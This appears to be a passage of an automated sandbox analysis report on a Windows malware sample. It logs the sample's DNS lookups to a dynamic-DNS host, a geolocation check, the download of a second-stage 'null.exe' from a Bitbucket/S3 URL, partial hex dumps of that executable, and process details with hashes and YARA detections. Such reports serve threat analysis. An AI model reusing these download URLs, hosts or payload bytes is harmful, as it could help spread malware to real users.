                                                                                                                                            Dec 12, 2024 17:42:16.418184996 CET1.1.1.1192.168.2.50xeebbNo error (0)newstaticfreepoint24.ddns-ip.net181.131.217.244A (IP address)IN (0x0001)false
                                                                                                                                            Dec 12, 2024 17:42:18.507611990 CET1.1.1.1192.168.2.50xb3dbNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • bitbucket.org
                                                                                                                                            • bbuseruploads.s3.amazonaws.com
                                                                                                                                            • geoplugin.net

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.549836178.237.33.5080768C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Dec 12, 2024 17:42:18.631762028 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                            Host: geoplugin.net
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Dec 12, 2024 17:42:19.875309944 CET1171INHTTP/1.1 200 OK
                                                                                                                                            date: Thu, 12 Dec 2024 16:42:19 GMT
                                                                                                                                            server: Apache
                                                                                                                                            content-length: 963
                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                            cache-control: public, max-age=300
                                                                                                                                            access-control-allow-origin: *
                                                                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":null, "geoplugin_currencySymbol_UTF8":"", "geoplugin_currencyConverter":0}


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.549736185.166.143.484435776C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-12 16:41:39 UTC101OUTGET /facturacioncol/fact/downloads/null.exe HTTP/1.1
                                                                                                                                            Host: bitbucket.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-12 16:41:40 UTC5938INHTTP/1.1 302 Found
                                                                                                                                            Date: Thu, 12 Dec 2024 16:41:40 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 0
                                                                                                                                            Server: AtlassianEdge
                                                                                                                                            Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacup [TRUNCATED]
                                                                                                                                            Expires: Thu, 12 Dec 2024 16:41:40 GMT
                                                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                            X-Used-Mesh: False
                                                                                                                                            Vary: Accept-Language, Origin
                                                                                                                                            Content-Language: en
                                                                                                                                            X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                            X-Dc-Location: Micros-3
                                                                                                                                            X-Served-By: 0d196a66cd78
                                                                                                                                            X-Version: b7875da02c7c
                                                                                                                                            X-Static-Version: b7875da02c7c
                                                                                                                                            X-Request-Count: 411
                                                                                                                                            X-Render-Time: 0.04936671257019043
                                                                                                                                            X-B3-Traceid: 7ecc51800cc1491387e4d5abc579fa23
                                                                                                                                            X-B3-Spanid: 1eb9ef32d8c8152d
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Content-Security-Policy: object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-e [TRUNCATED]
                                                                                                                                            X-Usage-Quota-Remaining: 999078.206
                                                                                                                                            X-Usage-Request-Cost: 936.27
                                                                                                                                            X-Usage-User-Time: 0.028088
                                                                                                                                            X-Usage-System-Time: 0.000000
                                                                                                                                            X-Usage-Input-Ops: 0
                                                                                                                                            X-Usage-Output-Ops: 0
                                                                                                                                            Age: 0
                                                                                                                                            X-Cache: MISS
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Xss-Protection: 1; mode=block
                                                                                                                                            Atl-Traceid: 7ecc51800cc1491387e4d5abc579fa23
                                                                                                                                            Atl-Request-Id: 7ecc5180-0cc1-4913-87e4-d5abc579fa23
                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                            Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=3,atl-edge-upstream;dur=157,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.54974354.231.203.1054435776C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-12 16:41:42 UTC1177OUTGET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacupf41tUXUKIvQwULtF4tmDv7359nQosi0CBcA%2F4VOm6l [TRUNCATED]
                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-12 16:41:42 UTC538INHTTP/1.1 200 OK
                                                                                                                                            x-amz-id-2: ft8JI2Fuomh+dVTvww57rQbzQt4l8odBqwmV1Z7Oz+dzWjeWDY71vzIYHh1lZ8UmtsVouqjtOiY=
                                                                                                                                            x-amz-request-id: YWC2HAZDHK2FQTDB
                                                                                                                                            Date: Thu, 12 Dec 2024 16:41:43 GMT
                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 14:47:44 GMT
                                                                                                                                            ETag: "27650afe28ba588c759ade95bf403833"
                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                            x-amz-version-id: kXXRZ1mUq75DO3FONi1exQQCVC7lCh3.
                                                                                                                                            Content-Disposition: attachment; filename="null.exe"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Type: application/x-msdownload
                                                                                                                                            Content-Length: 4054528
                                                                                                                                            Server: AmazonS3
                                                                                                                                            Connection: close
                                                                                                                                            2024-12-12 16:41:42 UTC16384INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                            2024-12-12 16:41:42 UTC486INData Raw: 77 0f 8d 44 24 04 50 e8 34 c7 ff ff 83 f8 00 74 71 8b 44 24 04 fc e8 c9 f5 ff ff 8b 54 24 08 6a 00 50 68 2e 4c 40 00 52 ff 15 18 c0 61 00 8b 5c 24 04 81 3b de fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 10 c0 61 00 85 d2 0f 84 fa fe ff ff 89 d8 ff d2 85 c0 0f 84 ee fe ff ff 8b 53 0c e8 16 fb ff ff 8b 0d 04 c0 61 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 d6 03 00 00 31 c0 c3 8d 40 00 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 e8 4b 40 00 89 68 08 a3 3c c6 61 00 c3 8d 40 00 31 d2 a1 3c c6 61 00 85 c0 74 1c 64 8b 0a 39 c8 75 08 8b 00 64 89 02 c3 8b 09 83 f9 ff 74 08 39 01 75 f5 8b 00 89 01 c3 55 8b ec 53 56 57 bf 38 c6 61 00 8b 47 08 85 c0 74 48 8b 5f 0c 8b 70 04 33 d2 55 68 16 4d 40 00 64 ff 32 64 89 22 85 db 7e 12 4b 89 5f 0c 8b
                                                                                                                                            Data Ascii: wD$P4tqD$T$jPh.L@Ra\$;SCtaSatL$Q$1@1Edd@K@h<a@1<atd9udt9uUSVW8aGtH_p3UhM@d2d"~K_
                                                                                                                                            2024-12-12 16:41:42 UTC16384INData Raw: ea 26 00 00 83 c6 08 4f 75 ec 5e 5f 5b c3 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 8b 04 18 01 da e8 c5 26 00 00 83 c6 08 4f 75 eb 5e 5f 5b c3 8d 40 00 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 8b 04 18 03 46 08 89 04 1a 83 c6 0c 4f 75 ec 5e 5f 5b c3 53 56 8b 18 8d 70 04 8b 56 04 8b 06 e8 27 0a 00 00 83 c6 08 4b 75 f0 5e 5b c3 8b c0 53 56 57 be c8 10 61 00 b1 10 8b 1d 00 10 61 00 8b c3 bf 0a 00 00 00 99 f7 ff 80 c2 30 33 c0 8a c1 88 14 06 8b c3 bb 0a 00 00 00 99 f7 fb 8b d8 49 85 db 75 db b1 1c a1 04 10 61 00 8b d0 83 e2 0f 8a 92 e8 10 61 00 33 db 8a d9 88 14 1e c1 e8 04 49 85 c0 75 e6 5f 5e 5b c3 8b c0 31 c0 87 05 00 10 61 00 f7 d8 19 c0 40 bf 38 c6 61 00 8b 5f 18 8b 6f 14 ff 77 1c ff 77 20 8b 37 b9 0b 00 00 00 f3 a5 5f 5e c9 c2 0c 00
                                                                                                                                            Data Ascii: &Ou^_[S1WV<tF&Ou^_[@S1WV<tFFOu^_[SVpV'Ku^[SVWaa03Iuaa3Iu_^[1a@8a_oww 7_^
                                                                                                                                            2024-12-12 16:41:42 UTC1024INData Raw: 00 00 c0 8d 40 00 0c 00 00 00 3c 8e 40 00 00 00 00 00 00 00 00 00 3c 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 8e 40 00 0c 00 00 00 5c 11 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0e 00 00 00 00 00 01 00 00 00 08 11 40 00 04 00 00 00 09 45 78 63 65 70 74 69 6f 6e a4 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8e 40 00 0c 00 00 00 f0 8d 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 06 45 41 62 6f 72 74 90 f8 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 8e 40 00 10 00 00 00 f0 8d 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14
                                                                                                                                            Data Ascii: @<@<@N@\@E@E@E@E@E@PB@lB@B@@Exception@@@E@E@E@E@E@PB@lB@B@EAbort@@@E@E@E@
                                                                                                                                            2024-12-12 16:41:43 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 92 40 00 10 00 00 00 bc 8f 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0a 45 4d 61 74 68 45 72 72 6f 72 90 7c 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 92 40 00 10 00 00 00 d8 91 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0a 45 49 6e 76 61 6c 69 64 4f 70 90 d4 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 92 40 00 10 00 00 00 d8 91 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0b 45 5a 65 72 6f 44 69 76 69 64 65 2c 93 40 00 00
                                                                                                                                            Data Ascii: $@@E@E@E@E@E@PB@lB@B@EMathError|@|@@E@E@E@E@E@PB@lB@B@EInvalidOp@@@E@E@E@E@E@PB@lB@B@EZeroDivide,@
                                                                                                                                            2024-12-12 16:41:43 UTC1024INData Raw: 00 00 00 8b 45 08 50 0f b7 45 e6 8b 55 f4 e8 33 f8 ff ff 59 e9 dd 02 00 00 55 e8 73 f8 ff ff 59 83 7d f4 01 75 14 8b 45 08 50 a1 a4 c6 61 00 e8 72 fb ff ff 59 e9 bc 02 00 00 8b 45 08 50 a1 a8 c6 61 00 e8 5e fb ff ff 59 e9 a8 02 00 00 55 e8 3e f8 ff ff 59 55 e8 9b f8 ff ff 59 83 7d f4 03 7e 07 c7 45 f4 03 00 00 00 8b 45 08 50 0f b7 45 e4 8b 55 f4 e8 cd f7 ff ff 59 e9 77 02 00 00 55 e8 71 f8 ff ff 59 8b 75 fc 4e ba 1c d5 40 00 b9 05 00 00 00 8b c6 e8 fb dc ff ff 85 c0 75 28 66 83 7d ea 0c 72 03 83 c6 03 8b 45 08 50 ba 02 00 00 00 8b c6 e8 29 f7 ff ff 59 83 45 fc 04 c6 45 e2 01 e9 2f 02 00 00 ba 24 d5 40 00 b9 03 00 00 00 8b c6 e8 be dc ff ff 85 c0 75 28 66 83 7d ea 0c 72 03 83 c6 02 8b 45 08 50 ba 01 00 00 00 8b c6 e8 ec f6 ff ff 59 83 45 fc 02 c6 45 e2 01
                                                                                                                                            Data Ascii: EPEU3YUsY}uEParYEPa^YU>YUY}~EEPEUYwUqYuN@u(f}rEP)YEE/$@u(f}rEPYEE
                                                                                                                                            2024-12-12 16:41:43 UTC16384INData Raw: ff 75 08 92 e8 51 ff ff ff 5d c2 08 00 90 53 56 57 8b fa 8b f0 8b 1f eb 01 43 8b c6 e8 c1 7d ff ff 3b d8 7f 07 80 7c 1e ff 20 74 ed 89 1f 5f 5e 5b c3 55 8b ec 83 c4 f4 53 56 57 89 4d f8 89 55 fc 8b f8 c6 45 f7 00 8b 45 08 c6 00 00 8b 55 fc 8b c7 e8 b7 ff ff ff 8b 5d fc 8b 1b 33 f6 eb 17 8b c6 03 c0 8d 04 80 33 d2 8a 54 1f ff 66 83 ea 30 66 03 c2 8b f0 43 8b c7 e8 64 7d ff ff 3b d8 7f 11 8a 44 1f ff 04 d0 2c 0a 73 07 66 81 fe e8 03 72 cd 8b 45 fc 3b 18 7e 1d 8b c3 8b 55 fc 8b 12 2a c2 8b 55 08 88 02 8b 45 fc 89 18 8b 45 f8 66 89 30 c6 45 f7 01 8a 45 f7 5f 5e 5b 8b e5 5d c2 04 00 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f9 8b f2 89 45 fc 33 c0 55 68 25 d7 40 00 64 ff 30 64 89 20 33 db 85 ff 74 3a 8b d6 8b 45 fc e8 15 ff ff ff 8d 45 f8 50 8b c7
                                                                                                                                            Data Ascii: uQ]SVWC};| t_^[USVWMUEEU]33Tf0fCd};D,sfrE;~U*UEEf0EE_^[]@USVW3]E3Uh%@d0d 3t:EEP
                                                                                                                                            2024-12-12 16:41:43 UTC1024INData Raw: 61 6e 74 42 61 64 49 6e 64 65 78 45 72 72 6f 72 8b c0 44 16 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 16 41 00 0c 00 00 00 10 96 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 18 45 56 61 72 69 61 6e 74 41 72 72 61 79 4c 6f 63 6b 65 64 45 72 72 6f 72 8d 40 00 ac 16 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 16 41 00 0c 00 00 00 10 96 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 18 45 56 61 72 69 61 6e 74 41 72 72 61 79 43 72 65 61 74 65 45 72 72 6f 72 8d 40 00 14 17 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: antBadIndexErrorDADA@E@E@E@E@E@PB@lB@B@EVariantArrayLockedError@AA@E@E@E@E@E@PB@lB@B@EVariantArrayCreateError@A
                                                                                                                                            2024-12-12 16:41:43 UTC16384INData Raw: ff ff 33 c0 5a 59 59 64 89 10 68 05 1a 41 00 8d 45 fc e8 0b 37 ff ff c3 e9 49 30 ff ff eb f0 59 5d c3 55 8b ec 6a 00 33 c0 55 68 52 1a 41 00 64 ff 30 64 89 20 8d 55 fc a1 18 af 61 00 e8 ac 5a ff ff 8b 4d fc b2 01 a1 5c 18 41 00 e8 7d cd ff ff e8 48 30 ff ff 33 c0 5a 59 59 64 89 10 68 59 1a 41 00 8d 45 fc e8 b7 36 ff ff c3 e9 f5 2f ff ff eb f0 59 5d c3 55 8b ec 83 c4 e4 53 56 33 c9 89 4d ec 89 4d e8 89 4d e4 8b f2 8b d8 33 c0 55 68 eb 1a 41 00 64 ff 30 64 89 20 8d 55 ec 8b c3 e8 05 6a 00 00 8b 45 ec 89 45 f0 c6 45 f4 0b 8d 55 e8 8b c6 e8 f1 69 00 00 8b 45 e8 89 45 f8 c6 45 fc 0b 8d 45 f0 50 6a 01 8d 55 e4 a1 60 b0 61 00 e8 18 5a ff ff 8b 4d e4 b2 01 a1 68 14 41 00 e8 25 cd ff ff e8 b4 2f ff ff 33 c0 5a 59 59 64 89 10 68 f2 1a 41 00 8d 45 e4 ba 03 00 00 00
                                                                                                                                            Data Ascii: 3ZYYdhAE7I0Y]Uj3UhRAd0d UaZM\A}H03ZYYdhYAE6/Y]USV3MMM3UhAd0d UjEEEUiEEEEPjU`aZMhA%/3ZYYdhAE
                                                                                                                                            2024-12-12 16:41:43 UTC1024INData Raw: 02 00 00 ff 73 0c ff 73 08 8d 45 c8 e8 cd 49 ff ff 8b 55 c8 8b c6 e8 5b f7 fe ff e9 9e 02 00 00 8b 43 08 8b d0 8b c6 e8 aa fd ff ff e9 8d 02 00 00 8d 55 c4 8b c3 e8 e7 fb ff ff 8b 55 c4 8b c6 e8 31 f7 fe ff e9 74 02 00 00 8b d0 66 81 ea 00 01 74 07 66 ff ca 74 11 eb 28 8b c6 8b 53 08 e8 12 f7 fe ff e9 55 02 00 00 8d 55 c0 8b c3 e8 7b fc ff ff 8b 55 c0 8b c6 e8 f9 f6 fe ff e9 3c 02 00 00 f6 c4 40 0f 84 0b 02 00 00 0f b7 c0 25 ff bf ff ff 83 f8 14 0f 87 e4 01 00 00 ff 24 85 89 5a 41 00 66 5c 41 00 66 5c 41 00 dd 5a 41 00 fa 5a 41 00 16 5b 41 00 39 5b 41 00 5c 5b 41 00 7b 5b 41 00 9a 5b 41 00 66 5c 41 00 66 5c 41 00 ab 5b 41 00 58 5c 41 00 66 5c 41 00 66 5c 41 00 66 5c 41 00 c8 5b 41 00 e5 5b 41 00 02 5c 41 00 1f 5c 41 00 3c 5c 41 00 8d 55 bc 8b 43 08 0f bf
                                                                                                                                            Data Ascii: ssEIU[CUU1tftft(SUU{U<@%$ZAf\Af\AZAZA[A9[A\[A{[A[Af\Af\A[AX\Af\Af\Af\A[A[A\A\A<\AUC


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:11:41:15
                                                                                                                                            Start date:12/12/2024
                                                                                                                                            Path:C:\Users\user\Desktop\3XSXmrEOw7.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\3XSXmrEOw7.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:2'605'056 bytes
                                                                                                                                            MD5 hash:DDCE3B9704D1E4236548B1A458317DD0
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:11:41:32
                                                                                                                                            Start date:12/12/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                            Imagebase:0x370000
                                                                                                                                            File size:2'141'552 bytes
                                                                                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3994827103.0000000009880000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3993975930.0000000007FB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:11:41:52
                                                                                                                                            Start date:12/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\yjfesx.exe
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:4'054'528 bytes
                                                                                                                                            MD5 hash:27650AFE28BA588C759ADE95BF403833
